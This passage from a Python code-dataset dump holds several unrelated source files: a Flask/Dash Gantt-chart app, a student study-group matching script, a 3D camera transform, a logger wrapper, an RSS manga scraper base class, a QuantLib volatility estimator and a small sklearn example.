as ff\r\n\r\n# portはIBM Cloud環境から割り当てられたものを利用\r\nif os.getenv('VCAP_APP_PORT'):\r\n import metrics_tracker_client\r\n # Trackingするなら必要\r\n metrics_tracker_client.track()\r\n host = '0.0.0.0'\r\n port = port = os.getenv('VCAP_APP_PORT', '8000')\r\nelse:\r\n # ローカル用の設定\r\n host = '127.0.0.1'\r\n port = 5000\r\n\r\nserver = Flask(__name__)\r\nbootstrap = Bootstrap(server)\r\napp = dash.Dash(__name__, server=server)\r\n# external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\n# app = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\n\r\nVALID_USERNAME_PASSWORD_PAIRS = [\r\n ['*****', '*****']\r\n]\r\nusers = {\r\n \"*****\": \"*****\"\r\n}\r\n\r\nauth = dash_auth.BasicAuth(\r\n app,\r\n VALID_USERNAME_PASSWORD_PAIRS\r\n)\r\nauth_flask = HTTPBasicAuth()\r\n\r\n# グラフ作成のモジュール\r\ngantt = mg.Test()\r\n\r\n@auth_flask.get_password\r\ndef get_pw(username):\r\n if username in users:\r\n return users.get(username)\r\n return None\r\n\r\n# 直観的にわかりづらいので children は削除\r\ndef serve_layout():\r\n \r\n fig_task = gantt.task()\r\n fig_member = gantt.member()\r\n \r\n \r\n return html.Div([\r\n html.Div([\r\n html.H1('**********'),\r\n html.Div('** ここには各ページのリンクを張る予定 **'),\r\n html.A('Navigate to \"コンテンツTOPページ\"', href='./top'),\r\n html.Br(),\r\n html.Br(),\r\n html.Div('*********'),\r\n ]\r\n , style={'background-color': '#eeeeee'}\r\n ),\r\n html.Div([dcc.Graph(figure=fig_task, id='gantt_task')]\r\n ), \r\n \r\n html.Div(dcc.Graph(figure=fig_member, id='gantt_member')\r\n ),\r\n ])\r\n\r\napp.layout = serve_layout\r\n\r\n# 念のため用意\r\n@server.route('/')\r\ndef index():\r\n return \"Hello World\"\r\n\r\n@server.route('/top')\r\n@auth_flask.login_required\r\ndef indexTwo():\r\n return render_template('index.html')\r\n\r\n#@app.callback()\r\n@server.route('/test')\r\ndef test():\r\n\r\n return \"\"\r\n\r\nif __name__ == \"__main__\":\r\n server.run(host=host, port=int(port), debug=True, threaded=True)\r\n app.run_server(debug=True)\r\n 
","sub_path":"guntchart_plotly-dash_ibm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"380240607","text":"import pandas as pd\nimport openpyxl\nimport numpy as np\nfrom collections import defaultdict\n\ndef get_num_people(df_alone_type):\n num_ppl = []\n df_alone_type = df_alone_type.sort_values(['study_with','preference', 'code_1', 'prof_1'], ascending=True).reset_index()\n num_by_code_prof = df_alone_type.groupby([\"code_1\", \"prof_1\"]).size().reset_index(name='counts')\n sum = 0\n for index1, row in num_by_code_prof.iterrows():\n num_ppl.append(row['counts'])\n sum = sum + row['counts']\n return num_ppl\n\ndef allocate_groups_dict(df_alone, groups, cannot_grouped, num_ppl) :\n idx = 0\n for num in num_ppl :\n\n if num <= 2 :\n for i in range(0, num):\n value = df_alone.iloc[idx: idx + 1]\n cannot_grouped.add(value['sid'].values[0])\n idx += 1\n\n else:\n for i in range(0, num):\n value = df_alone.iloc[idx : idx + 1]\n lect = '{}_{}'.format(value['code_1'].values[0], value['prof_1'].values[0])\n\n if lect not in groups.keys():\n groups[lect] = set()\n groups[lect].add(value['sid'].values[0])\n\n idx += 1\n\ndef get_num_people_rest(df_alone_type):\n num_ppl = []\n df_alone_type = df_alone_type.sort_values(['code_1'], ascending=True).reset_index()\n num_by_code_prof = df_alone_type.groupby([\"code_1\"]).size().reset_index(name='counts')\n for index1, row in num_by_code_prof.iterrows():\n num_ppl.append(row['counts'])\n return num_ppl\n\ndef allocate_rest_to_other_groups_code(df_grouped_rest, offline_groups, online_groups, anything_groups, hope_col) :\n for index, row in df_grouped_rest.iterrows() :\n status = False\n searching_group = [offline_groups, online_groups, anything_groups]\n\n for i in range(3):\n if row['preference'] != 3 and i == row['preference'] - 1:\n continue\n for key in searching_group[i].keys():\n if key.rsplit('_', 1)[0] == row[hope_col] :\n searching_group[i][key].add(row['sid']) \n ungrouped[['offline', 'online', 'anything'][row['preference'] - 1]].discard(row['sid'])\n status = True\n break\n if status == True : \n status = False\n break\n\ndef automatch(df):\n df = pd.read_csv('Study_Match_Revised.csv', header = 0, index_col = False, names = ['timestamp', 'email', 'id', 'name', 'gender', 'phone', 'preference', 'study_with', 'code_1', 'name_1', 'prof_1', 'code_2', 'name_2', 'prof_2', 'code_3', 'name_3', 'prof_3', 'etc', 'etc_q1', 'etc_q2', 'etc_q3', 'etc_q4', 'agreement'])\n\n origin_col_name = df.columns\n changed_col_name = ['timestamp', 'email', 'sid', 'name', 'gender', 'phone', 'preference', 'study_with', 'code_1', 'name_1', 'prof_1', 'code_2', 'name_2', 'prof_2', 'code_3', 'name_3', 'prof_3', 'etc', 'etc_q1', 'etc_q2', 'etc_q3', 'etc_q4', 'agreement']\n\n df = df.set_axis(changed_col_name, axis = 1)\n df.insert(0, 'group', [0 for _ in range(len(df))], True)\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n df.at[df['agreement'] == '아니오', 'group'] = -1\n df = df.drop(df[pd.isnull(df['timestamp'])].index)\n\n df = df[['group', 'sid', 'gender', 'name', 'email', 'phone', 'timestamp', 'preference', 'study_with', 'code_1', 'prof_1', 'code_2', 'prof_2', 'code_3', 'prof_3']]\n df['preference'] = df['preference'].replace({'대면 스터디로만 매칭' : 1, '비대면 스터디로만 매칭' : 2, '비대면/대면 병행 상관없음' : 3})\n\n df['prof_1'] = df['prof_1'].str.replace(\"교수님\", \"\").str.strip()\n df['prof_2'] = df['prof_2'].str.replace(\"교수님\", \"\").str.strip()\n df['prof_3'] = 
df['prof_3'].str.replace(\"교수님\", \"\").str.strip()\n\n    # Course codes: upper-case and strip whitespace\n    df['code_1'] = df['code_1'].str.upper().str.strip()\n    df['code_2'] = df['code_2'].str.upper().str.strip()\n    df['code_3'] = df['code_3'].str.upper().str.strip()\n\n    group_num = 1\n\n    # 1. First build groups of people who applied together (currently only 2 members accepted; matching by name is ambiguous) => incomplete\n    groups_tmp = []\n    friend_groups = []\n    uncompleted_groups = []\n    cannot_grouped_friends = []\n\n    df_friends = df.loc[df['study_with'].notnull()] # + only people who consented to the privacy terms\n    # df_friends['study_with'] = df_friends['study_with'].str.replace(\" *[0-9()]*$\", \"\", regex=True)\n\n    private_groups = list()\n\n    for ind, each in df_friends.iterrows():\n        others = {(one[:one.index('(')], one[one.index('(') + 1:one.index(')')]) for one in each['study_with'].split(' ')}\n        intersection_check = False\n        for private_group in private_groups:\n            if len(private_group.intersection(others)) > 0:\n                intersection_check = True\n                private_group.update(others)\n                break\n        \n        if intersection_check == False:\n            private_groups.append(others)\n\n\n    for private_group in private_groups:\n        ready_to_group = True\n\n        # validation check: group members\n        if not 3 <= len(private_group) <= 5:\n            ready_to_group = False\n\n        else:\n            primary_subject = None\n            for each in private_group:\n                name_query = df[df['name'] == each[0]].index\n                phone_query = df[df['phone'].str[-4:] == each[1][-4:]].index\n\n                target = name_query.intersection(phone_query)\n\n                # validation check: member validity\n                if len(target) != 1:\n                    ready_to_group = False # invalid member\n                    break\n\n                # validation check: members except her/himself\n                others = {(other[ : other.index('(')], other[other.index('(') + 1 : other.index(')')]) for other in df.at[target[0], 'study_with'].split(' ')}\n                if others != private_group.difference({each, }):\n                    ready_to_group = False # Unknown member exists\n                    break\n\n                # validation check: primary subject\n                if primary_subject is None:\n                    primary_subject = df.at[target[0], 'code_1']\n                elif primary_subject != df.at[target[0], 'code_1']:\n                    ready_to_group = False\n                    break\n\n        if ready_to_group == False:\n            for each in private_group:\n                name_query = df[df['name'] == each[0]].index\n                phone_query = df[df['phone'].str[-4:] == each[1][-4:]].index\n\n                target = name_query.intersection(phone_query)\n\n                if len(target) != 1:\n                    continue\n\n                df.at[target[0], 'group'] = -2\n        else:\n            for each in private_group:\n                name_query = df[df['name'] == each[0]].index\n                phone_query = df[df['phone'].str[-4:] == each[1][-4:]].index\n\n                target = name_query.intersection(phone_query)\n\n                if len(target) != 1:\n                    continue\n\n                df.at[target[0], 'group'] = group_num\n            # df.loc[df['sid'].isin(student_id_lst), 'group'] = group_num\n            group_num += 1\n\n\n    # 2. For the remaining (solo) applicants, survey the requested courses, meeting preference, etc.\n    # df_alone = df.loc[df['study_with'].isnull()]\n    df_alone = df.loc[df['group'] == 0]\n    # df_alone['preference'] = df_alone['preference'].str.replace(\"[ ]\", \"\", regex=True)\n    # df_alone['code_1'] = df_alone['code_1'].str.replace(\"[ ]\", \"\", regex=True)\n\n\n    # # 3. 
Handle students who applied with only a first-choice course (students who chose only offline or only online first, then students with no preference)\n\n    num_ppl = {'offline' : [], 'online' : [], 'anything' : []}\n    grouped = {'offline' : dict(), 'online' : dict(), 'anything' : dict()}\n    ungrouped = {'offline' : set(), 'online' : set(), 'anything' : set()}\n    preference_type = {1 : 'offline', 2: 'online', 3: 'anything'}\n\n    df_targets = {'offline' : [], 'online' : [], 'anything' : []}\n\n    for preference in preference_type.keys():\n        df_targets[preference_type[preference]] = df_alone.loc[df_alone['preference'] == preference]\n        df_targets[preference_type[preference]] = df_targets[preference_type[preference]].sort_values(['study_with','preference', 'code_1', 'prof_1'], ascending=True).reset_index()\n\n        num_ppl[preference_type[preference]] = get_num_people(df_targets[preference_type[preference]])\n        allocate_groups_dict(df_targets[preference_type[preference]], grouped[preference_type[preference]], ungrouped[preference_type[preference]], num_ppl[preference_type[preference]])\n\n    # 4. Handle the remaining students (start with groups that are short of members (ignoring preference), continue until preference-ordered combinations become possible, then process the rest in order starting from the first choice)\n\n    num_ppl.update({'offline_rest' : [], 'online_rest' : []})\n    grouped.update({'offline_rest' : dict(), 'online_rest' : dict()})\n    ungrouped.update({'offline_rest' : set(), 'online_rest' : set()})\n    df_targets.update({'offline_rest' : [], 'online_rest' : []})\n\n    for preference in ('offline', 'online'):\n        rest = '{}_rest'.format(preference)\n        df_targets[rest] = df_alone[df_alone['sid'].isin(ungrouped[preference].union(ungrouped['anything']))]\n        df_targets[rest] = df_targets[rest].sort_values(['code_1'], ascending = True).reset_index()\n\n        num_ppl[rest] = get_num_people_rest(df_targets[rest])\n        allocate_groups_dict(df_targets[rest], grouped[rest], ungrouped[rest], num_ppl[rest])\n\n        #remove allocated people (grouped[rest][d] is a set of student ids, so iterate it directly)\n        for d in grouped[rest].keys():\n            for e in grouped[rest][d]:\n                if e in ungrouped[preference]:\n                    ungrouped[preference].discard(e)\n                if e in ungrouped['anything']:\n                    ungrouped['anything'].discard(e)\n        \n        for lect in grouped[rest].keys():\n            if lect not in grouped[preference].keys():\n                grouped[preference][lect] = grouped[rest][lect]\n            else:\n                grouped[preference][lect].update(grouped[rest][lect])\n\n    # allocate rest people to other groups whose # of member is < 5\n\n    df_targets.update({'rest' : []})\n\n    for code in ('code_1', 'code_2', 'code_3'):\n        df_targets['rest'] = df_alone[df_alone['sid'].isin(ungrouped['offline'].union(ungrouped['online']).union(ungrouped['anything']))]\n        df_targets['rest'] = df_targets['rest'].sort_values([code], ascending = True,).reset_index(drop = True) # reset_index is required for this to work properly!\n        allocate_rest_to_other_groups_code(df_targets['rest'], grouped['offline'], grouped['online'], grouped['anything'], ungrouped, code)\n\n    df_targets['rest'] = df_alone[df_alone['sid'].isin(ungrouped['offline'].union(ungrouped['online']).union(ungrouped['anything']))]\n    df_targets['rest'] = df_targets['rest'].sort_values(['code_1', 'prof_1'], ascending = True).reset_index(drop = True)\n\n\n\n    # print()\n    # print(\"------ Final ------ \")\n    # print(\"offline\")\n    # sum = 0\n    # for e in grouped['offline'].keys(): # merged with rest\n    #     sum += len(grouped['offline'][e])\n    # print(sum)\n\n    # print(\"online\")\n    # sum = 0\n    # for e in grouped['online']: # merged with rest\n    #     sum += len(grouped['online'][e])\n    # print(sum)\n\n    # sum = 0\n    # print(\"anything\")\n    # for e in grouped['anything']:\n    #     sum += len(grouped['anything'][e])\n    # print(sum)\n\n\n    # print(\"——people not yet assigned——\")\n    # print(ungrouped['offline'])\n    # 
print(ungrouped['online'])\n    # print(ungrouped['anything'])\n    # print(len(ungrouped['offline'].union(ungrouped['online']).union(ungrouped['anything'])))\n    # print()\n\n\n    # (option) 5. Reduce the number of 3-person groups\n\n    # 6. Assign group numbers according to group sizes\n    # group_num = 1\n    for preference in preference_type.values():\n        for code, student_id_lst in grouped[preference].items():\n\n            n = len(student_id_lst)\n\n            if n < 11:\n                group_numbers = [[3], [4], [5], [3, 3], [4, 3], [4, 4], [5, 4], [5, 5]][n - 3]\n            else:\n                group_numbers = [[4, 4], [4, 4], [5, 4], [5, 5]][n % 4 - 3] + ([4] * (((n + 1) // 4) - 3)) + ([3] if n % 4 == 3 else [4])\n\n            for sid in student_id_lst:\n                df.loc[df['sid'] == sid, 'group'] = group_num\n\n                group_numbers[0] -= 1\n                if group_numbers[0] == 0:\n                    del group_numbers[0]\n                    group_num += 1\n\n    # 7. Save as a result.csv file\n    df = df.sort_values('group', ascending=True).reset_index(drop=True)\n    df.to_csv(\"result.csv\", float_format='%.f', index = False, encoding = 'EUC-KR')","sub_path":"photos/auto_match.py","file_name":"auto_match.py","file_ext":"py","file_size_in_byte":12905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"92159869","text":"from math import cos, sin, asin, sqrt, acos, atan2, pi\r\n\r\nclass Camera():\r\n    def __init__(self,translation,starting,camera):\r\n        self.dx,self.dy,self.dz = translation[0],translation[1],translation[2]\r\n        self.sx,self.sy,self.sz = starting[0],starting[1],starting[2]\r\n        self.cx,self.cy,self.cz = camera[0],camera[1],camera[2]\r\n        # normalize\r\n        self.s_mag = sqrt(self.sx**2+self.sy**2+self.sz**2)\r\n        self.c_mag = sqrt(self.cx**2+self.cy**2+self.cz**2)\r\n        # self.sx = self.sx/(self.s_mag)\r\n        # self.sy = self.sy/(self.s_mag)\r\n        # self.sz = self.sz/(self.s_mag)\r\n        # self.cx = self.cx/(self.c_mag)\r\n        # self.cy = self.cy/(self.c_mag)\r\n        # self.cz = self.cz/(self.c_mag)\r\n        # print(self.cx,self.cy,self.cz)\r\n    def global_to_local(self,xg,yg,zg):\r\n        # cross product\r\n        rx = self.sy/self.s_mag*self.cz/self.c_mag - self.sz/self.s_mag*self.cy/self.c_mag\r\n        ry = self.sz/self.s_mag*self.cx/self.c_mag - self.sx/self.s_mag*self.cz/self.c_mag\r\n        rz = self.sx/self.s_mag*self.cy/self.c_mag - self.sy/self.s_mag*self.cx/self.c_mag\r\n        print(rx,ry,rz)\r\n\r\n        # angle to turn through\r\n        # theta = -asin(sqrt(rx**2 + ry**2 + rz**2))\r\n        # /(self.s_mag*self.c_mag)\r\n        theta = -acos((self.sx*self.cx+self.sy*self.cy+self.sz*self.cz)/(self.s_mag*self.c_mag))\r\n        print(theta*180.0/pi)\r\n\r\n        # local cartesian coordinates\r\n        xc = (rx*rx*(1-cos(theta))+cos(theta))*xg + (rx*ry*(1-cos(theta))-rz*sin(theta))*yg + (rx*rz*(1-cos(theta))+ry*sin(theta))*zg + self.dx\r\n        yc = (rx*ry*(1-cos(theta))+rz*sin(theta))*xg + (ry*ry*(1-cos(theta))+cos(theta))*yg + (ry*rz*(1-cos(theta))-rx*sin(theta))*zg + self.dy\r\n        zc = (rx*rz*(1-cos(theta))-ry*sin(theta))*xg + (ry*rz*(1-cos(theta))+rx*sin(theta))*yg + (rz*rz*(1-cos(theta))+cos(theta))*zg + self.dz\r\n\r\n        # convert local cartesian to local spherical polar\r\n        rho = sqrt(xc**2+yc**2+zc**2)\r\n        theta = acos(float(zc)/float(rho))\r\n        phi = atan2(yc,xc)\r\n\r\n        # report final values\r\n        print(xc,yc,zc)\r\n        # print(rho,theta*180.0/pi,phi*180.0/pi)\r\n        return (rho,theta,phi)\r\n    def local_to_global(self,rho,theta,phi):\r\n        xc = rho*sin(theta)*cos(phi)\r\n        yc = rho*sin(theta)*sin(phi)\r\n        zc = rho*cos(theta)\r\n        print(xc,yc,zc)\r\n        # cross product\r\n        rx = self.cy/self.c_mag*self.sz/self.s_mag - self.cz/self.c_mag*self.sy/self.s_mag\r\n        ry = self.cz/self.c_mag*self.sx/self.s_mag - self.cx/self.c_mag*self.sz/self.s_mag\r\n        rz = self.cx/self.c_mag*self.sy/self.s_mag - self.cy/self.c_mag*self.sx/self.s_mag\r\n\r\n        # 
angle to turn through\n theta = -asin(sqrt(rx**2 + ry**2 + rz**2))\n # theta = -acos((self.sx*self.cx+self.sy*self.cy+self.sz*self.cz)/(self.s_mag*self.c_mag))\n print(theta*180.0/pi)\n\n # local cartesian coordinates\n xg = (rx*rx*(1-cos(theta))+cos(theta))*xc + (rx*ry*(1-cos(theta))-rz*sin(theta))*yc + (rx*rz*(1-cos(theta))+ry*sin(theta))*zc - self.dx\n yg = (rx*ry*(1-cos(theta))+rz*sin(theta))*xc + (ry*ry*(1-cos(theta))+cos(theta))*yc + (ry*rz*(1-cos(theta))-rx*sin(theta))*zc - self.dy\n zg = (rx*rz*(1-cos(theta))-ry*sin(theta))*xc + (ry*rz*(1-cos(theta))+rx*sin(theta))*yc + (rz*rz*(1-cos(theta))+cos(theta))*zc - self.dz\n return (xg,yg,zg)\n\ncamera1 = Camera([0,0,0],[1,0,0],[1,1,1])\nrho,theta,phi = camera1.global_to_local(1,1,1)\nprint(rho,theta*180.0/pi,phi*180.0/pi)\nprint(camera1.local_to_global(rho,theta,phi))","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"274694050","text":"import logging\nfrom datetime import datetime\n\nclass logger:\n\n def __init__(self,handler:str):\n \"\"\"Create a logger\n\n Args:\n handler (str): Handler for the logger\n \"\"\"\n now = datetime.now()\n time = now.strftime(\"%Y-%m-%d-%H-%M-%S\")\n \n logs_filename = f\"logs/{handler}/{time}-log.txt\"\n handle=handler\n logging.basicConfig(filename=logs_filename,filemode=\"w\",level=logging.NOTSET)\n self.logger = logging.getLogger(handle)\n\n\n def log_info(self,msg: str):\n \"\"\" Functión to Log an info message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n if not msg==\"\":\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.info(msg)\n else:\n pass\n\n def log_warning(self,msg: str):\n \"\"\" Functión to Log an warning message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.warning(msg)\n\n def log_error(self,msg: str):\n \"\"\" Functión to Log an error message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.error(msg)\n\n def log_critical(self,msg: str):\n \"\"\" Functión to Log an critical error message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.critical(msg)\n\n def log_debug(self,msg: str):\n \"\"\" Functión to Log an debug message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.debug(msg)","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"524908159","text":"import time\nfrom abc import ABC, abstractmethod\nfrom calendar import timegm\nfrom datetime import datetime, timedelta\nimport feedparser\nfrom typing import Optional, List, Iterable, Dict, Pattern, Any, Type, Union\nimport logging\n\nimport psycopg2\n\nfrom src.db.mappers.chapter_mapper import ChapterMapper\nfrom src.errors import FeedHttpError, InvalidFeedError\nfrom src.scrapers.base_scraper import BaseScraper, BaseChapter\nfrom src.utils.utilities import (match_title, is_valid_feed, group_by_manga,\n 
get_latest_chapters)\n\nlogger = logging.getLogger('debug')\n\n\nclass RSSChapter(BaseChapter):\n \"\"\"\n A sensible default implementation for a chapter in an RSS feed\n \"\"\"\n def __init__(self,\n chapter_title: Optional[str],\n chapter_number: str,\n chapter_identifier: str,\n title_id: str,\n volume: str = None,\n decimal: str = None,\n release_date: Optional[Union[time.struct_time, datetime]] = None,\n manga_title: str = None,\n manga_url: str = None,\n group: str = None\n ):\n self._chapter_title = chapter_title\n self._chapter_number = int(chapter_number)\n self._chapter_identifier = chapter_identifier\n self._title_id = title_id\n self._volume = int(volume) if volume else None\n self._decimal = int(decimal) if decimal else None\n self._manga_title = manga_title\n self._manga_url = manga_url\n self._group = group\n\n if isinstance(release_date, time.struct_time):\n self._release_date = datetime.utcfromtimestamp(timegm(release_date))\n else:\n self._release_date = release_date if release_date else datetime.utcnow()\n\n @property\n def chapter_title(self) -> Optional[str]:\n return self._chapter_title\n\n @property\n def chapter_number(self) -> int:\n return self._chapter_number\n\n @property\n def volume(self) -> Optional[int]:\n return self._volume\n\n @property\n def decimal(self) -> Optional[int]:\n return self._decimal\n\n @property\n def release_date(self) -> datetime:\n return self._release_date\n\n @property\n def chapter_identifier(self) -> str:\n return self._chapter_identifier\n\n @property\n def title_id(self) -> str:\n return self._title_id\n\n @property\n def manga_title(self) -> Optional[str]:\n return self._manga_title\n\n @property\n def manga_url(self) -> Optional[str]:\n return self._manga_url\n\n @property\n def group(self) -> Optional[str]:\n return self._group\n\n @property\n def title(self) -> str:\n return self.chapter_title or f'{\"Volume \" + str(self.volume) + \", \" if self.volume is not None else \"\"}Chapter {self.chapter_number}{\"\" if not self.decimal else \".\" + str(self.decimal)}'\n\n\nclass BaseRSS(BaseScraper, ABC):\n TITLE_REGEX: Pattern = None\n Chapter: Type[RSSChapter] = RSSChapter\n\n def __init_subclass__(cls, **kwargs):\n if cls.TITLE_REGEX is None:\n raise NotImplementedError('Service does not have a title regex to parse entries')\n\n @abstractmethod\n def get_chapter_id(self, entry: Dict) -> str:\n \"\"\"\n A method to get the chapter id for a feed entry\n Args:\n entry: A single entry in the RSS feed\n\n Returns:\n The id of the chapter\n \"\"\"\n raise NotImplementedError()\n\n @abstractmethod\n def get_chapter_title(self, entry: Dict) -> Optional[str]:\n \"\"\"\n Return the title of the chapter or None if the chapter name should be automatically generated\n Args:\n entry: A single entry in the RSS feed\n\n Returns:\n Title of the chapter or None\n \"\"\"\n raise NotImplementedError()\n\n @abstractmethod\n def get_title_id(self, entry: Dict) -> str:\n \"\"\"\n Get the title id for the manga of an entry\n Args:\n entry: A single entry in the RSS feed\n\n Returns:\n The title id\n \"\"\"\n raise NotImplementedError()\n\n @abstractmethod\n def get_group(self, entry: Dict) -> Optional[str]:\n \"\"\"\n Return the group responsible for this chapter\n Args:\n entry: A single entry in the RSS feed\n\n Returns:\n Name of the group\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def get_manga_title(self, entry: Dict) -> Optional[str]:\n \"\"\"\n Get the title of the manga\n Args:\n entry: A single entry in the RSS feed\n\n 
Returns:\n Title of the manga\n \"\"\"\n raise NotImplementedError\n\n def set_checked(self, service_id: int) -> None:\n try:\n super().set_checked(service_id)\n self.dbutil.update_service_whole(service_id, self.min_update_interval())\n except psycopg2.Error:\n logger.exception(f'Failed to update service {service_id}')\n\n def parse_feed(self, entries: Iterable[Dict]) -> List[RSSChapter]:\n titles = []\n for entry in entries:\n title = entry.get('title', '')\n match = self.TITLE_REGEX.match(title)\n kwargs: Dict[str, Any]\n if not match:\n match = match_title(title)\n if not match:\n logger.warning(f'Could not parse title from {title or entry}')\n continue\n\n logger.info(f'Fallback to universal regex successful on {title or entry}')\n\n kwargs = match\n else:\n kwargs = match.groupdict()\n\n kwargs['chapter_identifier'] = self.get_chapter_id(entry)\n kwargs['title_id'] = self.get_title_id(entry)\n kwargs['manga_title'] = self.get_manga_title(entry) or kwargs.get('manga_title')\n\n if not kwargs['title_id'] or not kwargs['chapter_identifier']:\n logger.warning(f'Could not parse ids from {entry}')\n continue\n\n if 'chapter_title' not in kwargs:\n kwargs['chapter_title'] = self.get_chapter_title(entry)\n\n kwargs['manga_url'] = self.MANGA_URL_FORMAT.format(kwargs['title_id'])\n kwargs['release_date'] = entry.get('published_parsed') or entry.get('updated_parsed')\n kwargs['group'] = self.get_group(entry)\n\n try:\n titles.append(self.Chapter(**kwargs))\n except:\n logger.exception(f'Failed to parse chapter {entry}')\n continue\n\n return titles\n\n @staticmethod\n def min_update_interval() -> timedelta:\n return BaseRSS.UPDATE_INTERVAL\n\n def scrape_series(self, title_id: str, service_id: int, manga_id: int,\n feed_url: Optional[str] = None) -> Optional[bool]:\n pass\n\n def scrape_service(self, service_id: int, feed_url: str,\n last_update: Optional[datetime],\n title_id: Optional[str] = None):\n feed = feedparser.parse(feed_url if not title_id else feed_url + f'/manga_id/{title_id}')\n try:\n is_valid_feed(feed)\n except (FeedHttpError, InvalidFeedError):\n logger.exception(f'Failed to fetch feed {feed_url}')\n return\n\n entries: List[RSSChapter] = self.dbutil.get_only_latest_entries(service_id, self.parse_feed(feed.entries))\n\n if not entries:\n logger.info('No new entries found')\n return\n\n logger.info('%s new chapters found. 
%s', len(entries),\n [e.chapter_identifier for e in entries])\n\n titles = group_by_manga(entries)\n\n chapters = []\n manga_ids = set()\n\n # Find already added titles\n with self.conn:\n with self.conn.cursor() as cur:\n for row in self.dbutil.find_added_titles(cur, tuple(titles.keys())):\n manga_id = row['manga_id']\n manga_ids.add(manga_id)\n for chapter in titles.pop(row['title_id']):\n chapters.append(ChapterMapper.base_chapter_to_db(chapter, manga_id, service_id))\n\n # Add new titles\n if titles:\n with self.conn:\n with self.conn.cursor() as cur:\n for manga_id, inner_chapters in self.dbutil.add_new_series(cur, titles, service_id, True):\n manga_ids.add(manga_id)\n for chapter in inner_chapters:\n chapters.append(ChapterMapper.base_chapter_to_db(chapter, manga_id, service_id))\n\n self.dbutil.add_chapters(chapters, fetch=False)\n\n chapter_rows = [{\n 'chapter_decimal': c.chapter_decimal,\n 'manga_id': c.manga_id,\n 'chapter_number': c.chapter_number,\n 'release_date': c.release_date\n } for c in chapters]\n self.dbutil.update_latest_chapter(tuple(c for c in get_latest_chapters(chapter_rows).values()))\n\n return manga_ids\n\n def add_service(self):\n self.add_service_whole()\n","sub_path":"src/scrapers/base_rss.py","file_name":"base_rss.py","file_ext":"py","file_size_in_byte":9165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"215520878","text":"from Utilities.utilities import *\nfrom bs_model.bs_estimate_vol import estimiate_bs_constant_vol\nimport QuantLib as ql\nimport timeit\nimport os\nimport pickle\n\n\nstart = timeit.default_timer()\n\ncalendar = ql.China()\ndaycounter = ql.ActualActual()\n\n\nbegDate = ql.Date(1, 9, 2015)\n#begDate = ql.Date(18, 7, 2017)\nendDate = ql.Date(20, 7, 2017)\nevalDate = begDate\n\nestimatied_vols = {}\nwhile evalDate < endDate:\n print('Start : ', evalDate)\n\n evalDate = calendar.advance(evalDate, ql.Period(1, ql.Days))\n ql.Settings.instance().evaluationDate = evalDate\n try:\n print(evalDate)\n\n estimate_vol, min_sse = estimiate_bs_constant_vol(evalDate, calendar, daycounter)\n estimatied_vols.update({to_dt_date(evalDate):estimate_vol})\n print(estimate_vol)\n except Exception as e:\n print(e)\n continue\n\nprint('estimatied_vols = ',estimatied_vols)\nstop = timeit.default_timer()\nprint('calibration time : ',stop-start)\n\nwith open(os.getcwd()+'/intermediate_data/total_hedging_bs_estimated_vols.pickle','wb') as f:\n pickle.dump([estimatied_vols],f)\n\n\n","sub_path":"bs_model/bs_estimate_vols_ts.py","file_name":"bs_estimate_vols_ts.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"622189710","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 27 22:26:15 2017\n\n@author: Paulo Batista\nML Classification from Google Developers\n\"\"\"\n\nfrom sklearn import tree\nfeatures = [[140,1], [130,1], [150, 0], [170, 0]]\nlabels = [0, 0, 1, 1]\nclf = tree.DecisionTreeClassifier()\nclf = clf.fit(features, labels)\nprint(clf.predict([[120,0]]))\n","sub_path":"google-developers/ml-classification1.py","file_name":"ml-classification1.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"357503769","text":"import discord\nfrom discord.ext import commands\nimport variables\nimport random\nimport os\nimport pymongo\nfrom pymongo import MongoClient\nimport smtplib, ssl\nimport datetime\nfrom datetime 
